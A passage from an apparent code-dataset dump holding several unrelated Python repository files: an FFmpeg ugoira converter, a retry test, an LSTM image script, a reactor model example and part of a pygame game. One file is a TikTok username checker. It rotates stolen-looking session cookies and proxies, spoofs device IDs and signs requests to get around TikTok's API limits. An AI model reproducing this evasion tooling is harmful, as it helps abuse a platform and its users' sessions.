https://video.stackexchange.com/questions/20588/ffmpeg-flash-frames-last-still-image-in-concat-sequence\n ugoira_frames = ugoira_json['body']['frames'].copy()\n last_frame = ugoira_frames[-1].copy()\n last_frame['delay'] = 1\n ugoira_frames.append(last_frame)\n\n for frame in ugoira_frames:\n frame_file = frame['file']\n frame_duration = frame['delay'] / 1000\n frame_duration = round(frame_duration, 4)\n\n out_file.write(\n f'file {frame_file}\\n'\n f'duration {frame_duration}\\n\\n'\n )\n\n is_process_success = True\n verbose_print(verbose, 'Get ugoira frames done')\n\n return True\n\n\ndef convert_ugoira_frames(frames_path, video_output, ffmpeg_path, ffmpeg_args, interpolate=False, verbose=False):\n interpolate_arg = '-filter:v \"minterpolate=\\'fps=60\\'\"'\n if not interpolate:\n interpolate_arg = ''\n\n call_str = (\n f'\"{ffmpeg_path}\" -hide_banner -y '\n '-i ffconcat.txt '\n f'{interpolate_arg} '\n f'{ffmpeg_args} '\n f'\"{video_output}\" '\n )\n call_stack = shlex.split(call_str)\n\n verbose_print(verbose, f'Running FFmpeg with argument: \\n{call_str}')\n\n subprocess.call(\n call_stack,\n cwd=os.path.abspath(frames_path),\n )\n\n verbose_print(verbose, 'Convert ugoira frames done')\n\n\ndef verbose_print(verbose, message):\n if verbose:\n print(message)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=(\n 'Python script to download and convert an ugoira animation on '\n 'Pixiv, and convert it to a video via FFmpeg.'\n )\n )\n parser.add_argument(\n '--pixiv_id', type=int, required=False,\n help=(\n 'The pixiv ID for the ugoira illustration. Required if the '\n '--process argument is \"all\" or \"getframes\".'\n ),\n )\n parser.add_argument(\n '--frames_path', type=str, required=False,\n help=(\n 'The path to where the image frames and ffconcat.txt is. Required '\n 'if the --process argument is \"convertframes\".'\n ),\n )\n\n process_choices = ('all', 'getframes', 'convertframes', )\n parser.add_argument(\n '--process', type=str, required=False, default='all',\n choices=process_choices,\n help=(\n 'The process that should take place. \"all\" will execute both '\n '\"getframes\" and \"convertframes\". \"getframes\" will only obtain the '\n 'ugoira frames, and generate a FFmpeg concat demuxer file. '\n '\"convertframes\" will only convert the ugoira frames into a video '\n 'type of your choice through FFmpeg.'\n ),\n )\n\n parser.add_argument(\n '--video_output', type=str, required=False, default='output.webm',\n help=(\n 'The output filename for the converted video. Defaults to '\n '\"output.webm\".'\n ),\n )\n parser.add_argument(\n '--interpolate', action='store_true',\n help=(\n 'Attempts to interpolate the frames to 60 frames per second. Note, '\n 'it only works well with some ugoira, and would take a longer time '\n 'to finish conversion. Use with care.'\n ),\n )\n parser.add_argument(\n '--ffmpeg_path', type=str, required=False, default='ffmpeg',\n help='The path to the FFmpeg executable.',\n )\n parser.add_argument(\n '--ffmpeg_args', type=str, required=False,\n default='-c:v libvpx -crf 10 -b:v 2M -an',\n help=(\n 'The arguments for FFmpeg. Defaults to '\n '\"-c:v libvpx -crf 10 -b:v 2M -an\", which is VP8 WEBM with a '\n 'variable bitrate of 2 MBit/s, with no audio.'\n ),\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true',\n help='Forces the system to print out verbose process messages.',\n )\n\n args = parser.parse_args()\n msg_required = 'the following arguments are required:'\n\n if args.process in ('all', 'getframes', ) and not args.pixiv_id:\n parser.error(f'{msg_required} --pixiv_id')\n\n if args.process == 'convertframes' and not args.frames_path:\n parser.error(f'{msg_required} --frames_path')\n\n return args\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n exec_path = os.path.dirname(sys.argv[0])\n ugoira_path = None\n\n if args.process in ('all', 'getframes', ):\n ugoira_path = os.path.join(exec_path, f'ugoira_{args.pixiv_id}')\n is_success = get_ugoira_frames(\n args.pixiv_id,\n ugoira_path,\n args.verbose,\n )\n\n if not is_success:\n print(f'Unable to get ugoira data for ID {args.pixiv_id}')\n sys.exit(1)\n\n if args.process in ('all', 'convertframes', ):\n if ugoira_path is None:\n ugoira_path = args.frames_path\n\n convert_ugoira_frames(\n ugoira_path,\n args.video_output,\n args.ffmpeg_path,\n args.ffmpeg_args,\n args.interpolate,\n args.verbose,\n )\n","repo_name":"altbdoor/py-ugoira","sub_path":"py_ugoira.py","file_name":"py_ugoira.py","file_ext":"py","file_size_in_byte":7172,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"22007049016","text":"import pytest\n\nfrom pyaides.functools import retries\n\n\nclass TestDecorrelatedJitter:\n def test_basic(self):\n state = {\"called\": 0}\n\n @retries.decorrelated_jitter(3)\n def g():\n state[\"called\"] += 1\n return state\n\n assert g()[\"called\"] == 1\n assert g()[\"called\"] == 2\n\n def test_max_retry_error(self):\n state = {\"called\": 0}\n\n @retries.decorrelated_jitter(2, cap=0.5, base=0.1)\n def f():\n state[\"called\"] += 1\n raise ValueError(\"bomb\")\n\n with pytest.raises(ValueError) as exc:\n f()\n assert str(exc.value) == \"bomb\"\n assert state[\"called\"] == 2\n","repo_name":"okomestudio/pyaides","sub_path":"tests/pyaides/functools/test_retries.py","file_name":"test_retries.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27554657539","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom skimage import io\nimport os\nimport cv2\n\nfrom keras import Sequential\nfrom keras.layers import Dense, LSTM\n\nfrom gradientsHOG import returnHOG\n\n# global variables\nBLOCK_SIZE = 64\ntestSplit = 0.80\n\n# X stores input for training, y stores result (0 or 1)\nX = []\ny = []\nX_train = []\nX_test = []\ny_train = []\ny_test = []\nmodel = Sequential()\n\n# set up data to train and test on\ndef dataSetup():\n print('setup')\n # python 3\n # directory = os.fsencode('./images')\n\n filename = './images/basicRiver.jpg'\n # for filename in os.listdir('./images'):\n for i in range(0, 1):\n # python3\n # filename = os.fsdecode(file)\n # python2\n image = io.imread(filename, as_gray=True)\n\n for i in range(0, len(image[0]), BLOCK_SIZE):\n for j in range(0, len(image), BLOCK_SIZE):\n\n # j is row i is column\n\n # get subimage that is BLOCK_SIZE x BLOCK_SIZE\n imageTmp = image.copy()\n if (i + BLOCK_SIZE > len(image[0]) and j + BLOCK_SIZE > len(image)):\n subimage = image[len(image) - BLOCK_SIZE:len(image), len(image[0]) - BLOCK_SIZE:len(image[0])]\n cv2.rectangle(imageTmp, (len(image[0]) - BLOCK_SIZE, len(image) - BLOCK_SIZE), (len(image[0]), len(image)), (255, 255, 255), 2)\n elif (i + BLOCK_SIZE > len(image[0])):\n subimage = image[j:j + BLOCK_SIZE, len(image[0]) - BLOCK_SIZE:len(image[0])]\n cv2.rectangle(imageTmp, (len(image[0]) - BLOCK_SIZE, j), (len(image[0]), j + BLOCK_SIZE), (255, 255, 255), 2)\n elif (j + BLOCK_SIZE > len(image)):\n subimage = image[len(image) - BLOCK_SIZE:len(image), i:i + BLOCK_SIZE]\n cv2.rectangle(imageTmp, (i, len(image) - BLOCK_SIZE), (i+BLOCK_SIZE, len(image)), (255, 255, 255), 2)\n else:\n subimage = image[j:j + BLOCK_SIZE, i:i + BLOCK_SIZE]\n cv2.rectangle(imageTmp, (i, j), (i+BLOCK_SIZE, j+BLOCK_SIZE), (255, 255, 255), 2)\n\n # get image features for block and store in X\n tmp = returnHOG(subimage)\n X.append(tmp)\n\n # ask for user input on whether or not has river to set y\n cv2.namedWindow('image')\n cv2.moveWindow('image', 200, 200)\n cv2.imshow('image', imageTmp)\n key = cv2.waitKey(0)\n # cv2.destroyAllWindows()\n y.append(int(chr(key)))\n\n # split up training and test data\n X_np = np.array(X)\n y_np = np.array(y)\n testSize = int(testSplit * len(X_np))\n X_train = X_np[:testSize]\n X_test = X_np[testSize:]\n y_train = y_np[:testSize]\n y_test = y_np[testSize:]\n\n # resize X so works with lstm\n X_train = X_train.reshape(X_train.shape[0], (BLOCK_SIZE**2)/2, 1)\n X_test = X_test.reshape(X_test.shape[0], (BLOCK_SIZE**2)/2, 1)\n X_np\n print('done setup')\n\n# implents machine learning\ndef trainOnFeatures():\n print('train')\n model.add(LSTM(units=30, return_sequences=True, input_shape=(X.shape[1], 1)))\n model.add(LSTM(units=30, return_sequences=True))\n model.add(LSTM(units=30))\n model.add(Dense(units=1))\n model.summary()\n\n model.compile(optimizer='adam', loss='mean_squared_error')\n\n model.fit(X, y, epochs=10, batch_size=32)\n print('done train')\n\ndef testModel():\n print('test')\n predicted_value = model.predict(X)\n\n print(predicted_value)\n print(y)\n\n print('done test')\n\ndef main():\n dataSetup()\n trainOnFeatures()\n testModel()\n\nif __name__ == \"__main__\":\n main()","repo_name":"meisenstat/ComputerVisionAssignments","sub_path":"AssignmentThree/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72913163893","text":"from tls_client import Session\nfrom urllib.parse import urlencode, quote\nfrom random import randint, choice\nfrom json import load, loads\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom os import name, system\nfrom time import sleep\nfrom threading import Thread, active_count\n\n\nclass Checker:\n def __init__(this, usernames: list, sessions: list, proxies: list) -> None:\n this.config = load(open(\"./bin/config.json\", \"r\"))\n this.usernames = usernames\n this.sessions = sessions\n this.proxies = proxies\n this.unavailable = 0\n this.available = 0\n this.fails = 0\n this.checked = 0\n this.rpm = 0\n this.rps = 0\n \n this.user_agent = r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'\n \n def sign(this, url: str, ua: str | None = None, host: str = 'localhost', port: int = 1337) -> str:\n ua = this.user_agent if not ua else ua\n \n with socket(AF_INET, SOCK_STREAM) as client:\n client.connect((host, port))\n client.sendall(f\"GET /?url={quote(url)}&user_agent={quote(ua)} HTTP/1.0\\r\\n\\r\\n\".encode())\n response = client.recv(2048)\n \n return loads(response.split(b'\\r\\n')[-1])['signed_url']\n \n def rps_rpm_thread(this) -> None:\n while True:\n before = this.checked\n sleep(2)\n this.rps = (this.checked - before) * 2\n this.rpm = this.rps * 60\n \n def title_thread(this) -> None:\n if name == 'nt':\n while True:\n system(\n f'title TikTok Checker @xtekky ^| c: {this.checked} f: {this.fails} a: {this.available} u: {this.unavailable}' + \n f' ^| rps: {this.rps} rpm: {this.rpm}'\n )\n \n sleep(0.01)\n \n def check(this, unique_id: str) -> None:\n for _ in range(this.config['retries']):\n try:\n client = Session(client_identifier='chrome_109')\n \n headers = {\n 'authority' : 'www.tiktok.com',\n 'accept' : '*/*',\n 'accept-language' : 'en,fr-FR;q=0.9,fr;q=0.8,es-ES;q=0.7,es;q=0.6,en-US;q=0.5,am;q=0.4,de;q=0.3',\n 'cookie' : f'tiktok_webapp_theme=light; sessionid={choice(this.sessions)}',\n 'referer' : f'https://www.tiktok.com/@{unique_id}',\n 'sec-ch-ua' : '\"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"',\n 'sec-ch-ua-mobile' : '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest' : 'empty',\n 'sec-fetch-mode' : 'cors',\n 'sec-fetch-site' : 'same-origin',\n 'user-agent' : this.user_agent\n }\n \n params = urlencode({\n 'aid' :\t1988,\n 'app_language' :\t'en',\n 'app_name' :\t'tiktok_web',\n 'battery_info' :\t'0.6',\n 'browser_language' :\t'en',\n 'browser_name' :\t'Mozilla',\n 'browser_online' :\t'true',\n 'browser_platform' :\t'Win32',\n 'browser_version' :\t'5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',\n 'channel' :\t'tiktok_web',\n 'cookie_enabled' :\t'true',\n 'device_id' :\trandint(6999999999999999999, 7122222222222222222),\n 'device_platform' :\t'web_pc',\n 'focus_state' :\t'true',\n 'from_page' :\t'user',\n 'history_len' :\t'3',\n 'is_fullscreen' :\t'false',\n 'is_page_visible' :\t'true',\n 'os' :\t'windows',\n 'priority_region' :\t'FR',\n 'referer' :\t'',\n 'region' :\t'FR',\n \"screen_height\" : randint(777, 888),\n \"screen_width\" : randint(1333, 1666),\n 'tz_name' :\t'Europe/London',\n 'unique_id' :\tunique_id,\n 'webcast_language' :\t'en',\n })\n\n response = client.get(this.sign(f'https://www.tiktok.com/api/uniqueid/check/?{params}'), \n headers = headers, proxy = f'http://{choice(this.proxies)}', timeout=10).text.encode(); this.checked += 1\n \n if b'valid\":false' in response:\n print(f'res: {response}')\n this.unavailable += 1\n \n elif b'valid\":true' in response:\n print(f'res: {response}')\n this.available += 1\n \n else:\n this.fails += 1\n\n return\n \n except Exception as e:\n print(e)\n this.fails += 1\n \n def test(this):\n Thread(target=this.rps_rpm_thread).start()\n Thread(target=this.title_thread).start()\n \n while True:\n if active_count() < this.config['threads']:\n Thread(target=this.check, args=['uniqwfweewue_id']).start()\n\nif __name__ == '__main__':\n usernames = open(\"./bin/usernames.txt\", \"r\").read().splitlines()\n sessions = open(\"./bin/sessions.txt\", \"r\").read().splitlines()\n proxies = open(\"./bin/proxies.txt\", \"r\").read().splitlines()\n \n Checker(usernames, sessions, proxies).test()","repo_name":"xtekky/TikTok-Checker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"21"} +{"seq_id":"43532248785","text":"import random\r\nimport sys\r\n\r\nsf = open(sys.argv[1])\r\ntf = open(sys.argv[2])\r\nof = open(sys.argv[3], mode='w')\r\nnumLines = 0\r\nwhile True:\r\n\trandomNum = random.uniform(0,1)\r\n\tif randomNum < 0.5:\r\n\t\tsl = sf.readline()\r\n\t\tif not sl:\r\n\t\t\tbreak\r\n\t\tof.write(sl)\r\n\telse:\r\n\t\ttl = tf.readline()\r\n\t\tif not tl:\r\n\t\t\tbreak\r\n\t\tof.write(tl)\r\n\tnumLines += 1\r\n\tif numLines % 1000 == 0:\r\n\t\tprint(\"Process Lines: \", numLines)\r\nfor line in sf:\r\n\tof.write(line)\r\nfor line in tf:\r\n\tof.write(line)\r\nsf.close()\r\ntf.close()\r\nof.close()\r\n","repo_name":"Ivsucram/ACDC","sub_path":"FUSION/scripts/CombineStreams.py","file_name":"CombineStreams.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11012822734","text":"from asali.reactors.het1d import Heterogeneous1DReactor\n\n\ndef main(cantera_input_file, gas_phase_name, surface_phase_name):\n h = Heterogeneous1DReactor(cantera_input_file, gas_phase_name, surface_phase_name)\n h.set_length([0, 0.001, 0.025, 0.05, 0.1, 0.15, 0.2, 0.6, 0.65, 1.0, 1.5, 2.0], 'm')\n h.set_pressure(5, 'bar')\n h.set_catalytic_load(10, '1/m')\n h.set_volumetric_flow_rate(15., 'm3/h')\n h.set_inlet_temperature(250, 'degC')\n h.set_inlet_mass_fraction({'O2': 0.4, 'AR': 0.5, 'H2': 0.1})\n h.set_initial_coverage({'Rh(s)': 1})\n h.set_solid_density(2300, 'kg/m3')\n h.set_solid_specific_heat(750, 'J/kg/degK')\n h.set_solid_thermal_conductivity(2.5, 'W/m/degK')\n h.set_initial_solid_temperature(250, 'degC')\n h.set_energy(True)\n h.set_gas_diffusion(False)\n h.set_verbosity(False)\n h.set_resolution_method(\"STEADYSTATE\")\n h.set_packed_bed_reactor(0.3, 'mm', 1, 'cm', 0.75)\n return h.solve()\n","repo_name":"srebughini/ASALIPY","sub_path":"tests/Heterogeneous1DReactor/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"17534929487","text":"'''\nName: Thomas Luc\nDate: Jan 22, 2021\nClass Code: ICS3U\nTeacher: Mrs. Bokhari\n\nDescription: An (environmentally-friendly) game called 'The Green Reaper', made with the pygame Python module.\nThe player controls a 'grim reaper' character and casts spells using a 3x3 to kill different enemies. The premise\nof the story is that the character is killing off 'mutations' which originated from pollution, and in doing so, cleans\nthe planet. There are 5 different zones to go through, with increasing difficulty. The game mimics an isometric style rendering,\nso each tile appears to look three dimensional.\n\nReferences:\nHUGE thanks to DaFluffyPotato for his extremely helpful pygame tutorials:\nHis channel: https://www.youtube.com/channel/UCYNrBrBOgTfHswcz2DdZQFA\nThe tutorials I used for this project:\n-https://www.youtube.com/watch?v=gE2gTCwLdFM: Isometric Rendering \n-https://www.youtube.com/watch?v=5q7tmIlXROg: Game Scroll Effect\n-https://www.youtube.com/watch?v=4cYAkHfh9wM: Pixel Art\n-https://www.youtube.com/watch?v=l-GUfEJcTH4: Animations \n\n'''\n\n# importing modules ---------------------------------------------#\n\nimport pygame\n\nimport data.scripts.math_functions as m\nimport data.scripts.effects as e\n\n# setting up pygame ---------------------------------------------#\n\npygame.init()\npygame.display.set_caption('The Green Reaper')\nsize = (screen_width, screen_height) = (900,600)\nscreen = pygame.display.set_mode(size)\ntemp_display = pygame.Surface((300,300))\nclock = pygame.time.Clock()\nFPS = 60\nframe_count = 0\nsecond_frame_count = 0\nanimation_frame_surfaces = {} # holds all the frames' surfaces\nanimations_dictionary = {} # holds a list for every animation type, the keys being the name of each animation\n\n# helpful functions and code---------------------------------------------#\n\n\ndef load_image(filename,*args): # used to load in each image from the 'images' directory. optional arguments to specify colorkey.\n surface = pygame.image.load('data/images/' + filename + '.png')\n if len(args) != 0 and args[0]: # if an optional argument was specified and it is 'True'\n surface.set_colorkey((255,255,255)) # make white bg transparent\n else:\n surface.set_colorkey((0,0,0)) # make black bg transparent\n return surface\n\n\ndef load_animation(directory,frame_frequency,**kwargs): # used to load in each animation in the game\n global animation_frame_surfaces # each actual frame contained in the specified animation will be added to this dictionary\n animation_name = directory.split('/')[-1]\n animation_frame_names = [] # this list will hold just the names (string) of each frame_name for the ENTIRE animation\n\n for num, frame in enumerate(frame_frequency): # frame_frequency holds a list, ex. [1,1] specifying how many times each frame should appear in an animation\n frame_name = animation_name + str(num) # create the name of the frame\n frame_location = directory + '/' + frame_name + '.png' # create the location of the frame image, using the frame_name var\n frame_image = pygame.image.load(frame_location).convert() # load in each frame image\n frame_image.set_colorkey((255,255,255)) # sets white bg to transparent\n\n if 'size' not in kwargs: # if the keyworded argument 'size' was not given, this executes\n frame_image = pygame.transform.scale(frame_image,(100,100)) # by default, each frame will be 100x100 px\n else:\n frame_image = pygame.transform.scale(frame_image,kwargs['size']) # if a size was specified, each frame image will become that size\n\n animation_frame_surfaces[frame_name] = frame_image.copy() # load into dictionary the frame name + its actual surface\n\n for _ in range(frame): # frame is equal to the number in each index of frame_frequency. e.g [1,1] --> frame = 1 when this loop first iterates\n animation_frame_names.append(frame_name) # frame_name will be appended 'frame' (frame is a num) times.\n\n return animation_frame_names # return all the frame names for the animation.\n\n\ndef change_animation(animation_name,frame,new_animation,lock): # used to change the player's animation during the game\n if animation_name != new_animation and not lock: # animation_name represents the char's current animation. if it is the same as the proposed new animation, don't change it\n char_animation = new_animation # otherwise, we save the new animation in a var\n char_frame = 0 # reset the char's current frame to 0 so we start at the first frame of the new animation\n return char_animation, char_frame # return the name of the new animation to change to + the char's frame (0)\n return animation_name,frame # this will just return the same values found in the parameters\n\n\ndef create_font(font_size): # this returns the 'Silver' font with the specified size\n return pygame.font.Font('data/Silver.ttf', font_size)\n\n\ndef create_bg(col): # this is used to create the diagonal stripes seen in the background\n y = -150 # the polygon y-offset\n poly_points1 = [(0,150+y),(900,0+y),(900,100+y),(0,250+y)] # each set of poly points have increasing y values\n poly_points2 = [(0,350+y),(900,200+y),(900,300+y),(0,450+y)]\n poly_points3 = [(0,550+y),(900,400+y),(900,500+y),(0,650+y)]\n poly_points4 = [(0,750+y),(900,600+y),(900,700+y),(0,850+y)]\n\n pygame.draw.polygon(screen,col,poly_points1,0)\n pygame.draw.polygon(screen,col,poly_points2,0)\n pygame.draw.polygon(screen,col,poly_points3,0)\n pygame.draw.polygon(screen,col,poly_points4,0)\n\n\ndef load_map(map_num): # used for returning the map information of the map_num passed\n map_name = 'map' + str(map_num) # create the name of the map that we're opening\n f = open('data/maps/' + map_name + '.txt', 'r')\n map_data = [[tile for tile in tile_row.rstrip(\"\\n\")] for tile_row in f] # returns a nested list. each list holds the individual characters of one row\n f.close()\n return map_data\n\n\n# creating game over screen\nbackdrop = pygame.Surface((900,600)) # backdrop used to place on top of glitchy screen\nbackdrop.set_alpha(150) # make it semi-transparent so the user can still see the glitchy screen\ngame_over_font, game_over_font_2 = create_font(70), create_font(40)\ngame_over_txt = game_over_font.render('game over.', True,(194, 194, 194))\ngame_over_rect = game_over_txt.get_rect() # create a rectangle from the given text\ngame_over_rect.center = (450,300) # set its center so that I can easily display an element where I want it\ngame_over_txt_2 = game_over_font_2.render('press \\'r\\' to retry the level.', True, (204, 20, 20))\ngame_over_rect_2 = game_over_txt_2.get_rect()\ngame_over_rect_2.center = (450,350)\nending_txt_font, ending_txt_font2 = create_font(100), create_font(70)\nending_txt = ending_txt_font.render('thanks for playing!',True,(255,255,255))\nending_txt2 = ending_txt_font2.render('(and more importantly, saving the earth.)',True,(143, 146, 150))\nending_txt_rect, ending_txt_rect2 = ending_txt.get_rect(), ending_txt2.get_rect()\nending_txt_rect.center, ending_txt_rect2.center = (450,270), (450,375)\n\nlevel_transition = pygame.Surface((900,600)) # screen used as transition\nlevel_transition.fill((255,255,255)) # fill bg with white\nlevel_transition_alpha = 0 # var to hold the Surface's alpha val\nlevel_fade = False\nlevel_timer = 0\n\ngame_border = load_image('border',True).convert()\ngame_border = pygame.transform.scale(game_border,(900,600))\n\n# loading in game variables ----------------------------------------------------------------------------#\n\n# loading in intro message\nf = open('data/maps/game_intro.txt','r')\nintro_text = ''\nfor line in f:\n line = line.rstrip(\"\\n\") + ' '\n intro_text += line \nf.close()\n\n# loading in animations\nanimations_dictionary['idle'] = load_animation('data/images/animations/idle',[20,20])\nanimations_dictionary['walk'] = load_animation('data/images/animations/walk',[10,10,10])\nanimations_dictionary['jump'] = load_animation('data/images/animations/jump',[2,2,4,2,4,1])\nanimations_dictionary['slash'] = load_animation('data/images/animations/slash',[10,8,6,4,3],size=(200,200))\nanimations_dictionary['thunder'] = load_animation('data/images/animations/thunder',[2,2,2,2,2,2,2,2,2,2,5,2,2,2],size=(105,355))\nanimations_dictionary['slime'] = load_animation('data/enemies/slime',[15,15,15],size=(85,55))\nanimations_dictionary['slime_dmg'] = load_animation('data/enemies/damage/slime_dmg',[10],size=(85,55))\nanimations_dictionary['death'] = '' # empty for now as this animations are created depending on the char's current animation\nanimations_dictionary['screen_glitch'] = '' # empty for now as this animation requires a copy of the current screen when the char dies\n\n# game HUD (head up display)\nmana_bar = load_image('mana_bar',True).convert()\nmana_bar = pygame.transform.scale(mana_bar,(240,48))\nenemy_counter = load_image('enemy_count').convert()\nenemy_counter.set_colorkey((255,0,0))\nenemy_counter = pygame.transform.scale(enemy_counter,(234,102))\nenemy_counter_bg = pygame.Surface((205,65))\nenemy_counter_bg.fill((125, 125, 125))\nenemy_counter_bg.set_alpha(100)\nenemy_counter_font = create_font(55)\nlevel_header = load_image('level',True).convert()\nlevel_header = pygame.transform.scale(level_header,(288,80))\nlevel_font = create_font(50)\nscroll = load_image('scroll',True).convert()\nscroll = pygame.transform.scale(scroll,(600,728))\nscroll_font = create_font(30)\n\n# char animation variables\nchar_current_animation = 'idle' # create variable to hold character's current animation\nchar_current_frame = 0 # holds the char frame. it is used to draw the appropriate frame in an animation sequence\nchar_animation_flip = False # flip the frame depending on direction moving\nchar_animation_lock = False # used in change_animation function. if True, the char's animation will not change\n\n# level variables\ngame_running = True # bool val which is used by the main game loop\ncurrent_level = 1 # hold the current level\ncurrent_map = load_map(current_level) # load in the map one\ngame_scroll = [0,0] # allows the game to stay centered on the player as they move. 0th index = x-offset, 1st index = y-offset\nnumber_of_enemies = 0 # hold the original number of enemies on the current level\nfound_enemies = False\nfound_tvs = False\nsave_screen = None\nlevel_retry = False\nscroll_obj = [[450 - scroll.get_width()//2,700],True] # IN ORDER: scroll location (x,y), scroll active\n\n# game assets\nbridge = load_image('bridge').convert()\nbridge_reverse = pygame.transform.flip(bridge,True,False)\nbridge, bridge_reverse = pygame.transform.scale(bridge,(101,169)), pygame.transform.scale(bridge_reverse,(101,169))\ngreen_block, pink_block = load_image('ground_green').convert(), load_image('ground_pink').convert()\ngreen_block, pink_block = pygame.transform.scale(green_block,(101,170)), pygame.transform.scale(pink_block,(101,170))\ngreen_tree, pink_tree = load_image('green_tree').convert(), load_image('pink_tree').convert()\ngreen_tree, pink_tree = pygame.transform.scale(green_tree,(120,189)), pygame.transform.scale(pink_tree,(120,189))\ngreen_rock, pink_rock = load_image('green_rock').convert(), load_image('pink_rock').convert()\ngreen_rock, pink_rock = pygame.transform.scale(green_rock,(80,80)), pygame.transform.scale(pink_rock,(80,80))\nbroken_tv = load_image('tv',True).convert()\nbroken_tv = pygame.transform.scale(broken_tv,(80,90))\nbullet = load_image('bullet',True).convert()\nbullet = pygame.transform.scale(bullet,(30,30))\n\n# map tile variables\nfound_tiles = False\nfound_tiles_ypos = False\nbv = 50 # number which scales the x and y distance between each rendered tile\nactive_block, active_tree, active_rock = green_block, green_tree, green_rock # these three variables hold the current asset to be displayed, as blocks/trees/rocks have two potential colours\nactive_bg_col, active_bg_col2 = (45, 53, 61), (82, 96, 110) # variables to hold the current background colours\n\nclean_block = load_image('ground_clean').convert() # load in clean assets (blocks/trees/rocks) for when the player clears the level\nclean_block = pygame.transform.scale(clean_block,(101,170))\nclean_tree = load_image('clean_tree').convert()\nclean_tree = pygame.transform.scale(clean_tree,(120,189))\nclean_rock = load_image('clean_rock').convert()\nclean_rock = pygame.transform.scale(clean_rock,(80,80))\n\n# enemies\nslime_obj = ['slime',[0,0],0,[],'right',None,'move',False,2,255] # IN ORDER: name, location, current frame, enemy tiles, direction, hp_bar, animation, display hp_bar, hp, alpha\ntv_obj = [broken_tv,[],None,[],0,True, 255, 0] # IN ORDER: frame, location, hitbox, bullet list, bullet angle, show on screen bool, alpha, angle\nactive_enemies = [] # variable to hold all active slimes\nactive_tvs = [] # variable to hold all active TVs\nhp_bar = load_image('health_bar',True).convert()\nhp_bar = pygame.transform.scale(hp_bar,(55,15))\n\n# character variables\nchar_spawn = [100,0] # character initial spawn location on map\nchar_x, char_y = (100,100) # character x/y values\nchar_speed = 3\nchar_up = False # up/down/left/right bool vals will turn True if their respective directional keys are held down. upon release, they become False\nchar_down = False\nchar_left = False\nchar_right = False\nchar_jump = False # becomes True if the character is jumping (spacebar is pressed)\nchar_fall = False # becomes True if the character is falling down from jump\nchar_acceleration = 0 # for changing character's vertical acceleration\nchar_prev_pos = 0 # used to store character's previous y position after a jump, for when they land\nchar_mana = 255 # character's mana\nchar_alive = True\nchar_loaded = False\n\nchar_scythe = load_image('scythe',True).convert() # scythe which appears to be on the back of the character\nchar_scythe = pygame.transform.scale(char_scythe,(135,135))\nchar_shadow = load_image('char_shadow',True).convert()\nchar_shadow.set_alpha(200)\ndisplay_shadow = True # character's shadow will show below their feet if this bool is True\n\n# char spell casting variables\ngrid_point = load_image('grid_point',True).convert() # each 'grid point' or 'dot' on the 3x3 grid\ngrid_point = pygame.transform.scale(grid_point,(30,30))\nspell_bg = load_image('spell_bg',True).convert() # the frame seen around the 3x3 grid\ngrid_scale = 1 # adjust the gap between grid points\ngrid_point_diff = 1 # used to increase the difference in distance between each point, to make the grid expand\ngrid_points = [] # holds the locations of all 3x3 grid points\ngrid_max = False # turns True once the grid becomes a certain size\nactive_point = 4 # holds a num which corresponds to a certain grid point. the line being drawn will always start at this grid point\nslash_pic = load_image('slash',True).convert() # picture of the 'slash' attack pattern for scroll tutorial\nslash_pic = pygame.transform.scale(slash_pic,(150,150))\nthunder_pic = load_image('thunder',True).convert() # picture of the 'thunder' attack pattern for scroll tutorial\nthunder_pic = pygame.transform.scale(thunder_pic,(150,150))\n\nspells_dictionary = {\n 'slash': [[2, 1, 0, 3, 6],50], # 0th index: each number represents a grid point which must've been drawn to. this is the spell pattern. 1st index: spell mana cost\n 'thunder': [[1, 3, 4, 5, 7],100]\n}\n\nspell_cast = [False,[0,0],[],[],['',0,[0,0]]] # spell active, grid location, line points, points touched, [current spell active, its frame,[location]]\n\n# glitch colours\nglitch_colours = [(16, 26, 86),(22, 45, 118),(36, 86, 196),(195, 20, 118),(51, 7, 57),(28, 93, 129),(163, 127, 241),(99, 24, 79),(69, 173, 204)]\ngsl = 0 # grow side length - used to scale up certain glitch effects, such as the one found in the 3x3 grid\n\n# intro variables\nrunning = True\nintro_overlay_surf = pygame.Surface((900,600))\nintro_overlay_surf.set_alpha(200)\nintro_font = create_font(27)\narrow_font = create_font(70)\ntext_rect = pygame.Rect(50,50,800,500)\nintro_framecount = 0\n\n# introductory game loop ---------------------------------------------------------------------------------------------------------------#\nwhile running:\n mx, my = pygame.mouse.get_pos() # vars for holding mouse position\n glitch_bgs = e.create_glitch_effect(900,height=600) # returns a list containing each Surface a part of the 'glitch' effect. there are three overall layers\n arrow_str = '>' * (intro_framecount // 20 + 1) # this will be a str with 1,2 or 3 '>' symbols depending on the frame count\n arrow_text = arrow_font.render(arrow_str,True,(255,255,255))\n arrow_text_rect = arrow_text.get_rect()\n arrow_text_rect.center = (800,550)\n\n for glitch_bg in glitch_bgs: # blit each Surface in the glitch_bgs list onto the screen\n screen.blit(glitch_bg,(0,0))\n\n screen.blit(intro_overlay_surf,(0,0))\n m.drawText(screen,intro_text,(255,255,255),text_rect,intro_font,aa=True,bkg=None) # use drawText function to draw text, which automatically wraps depending on the 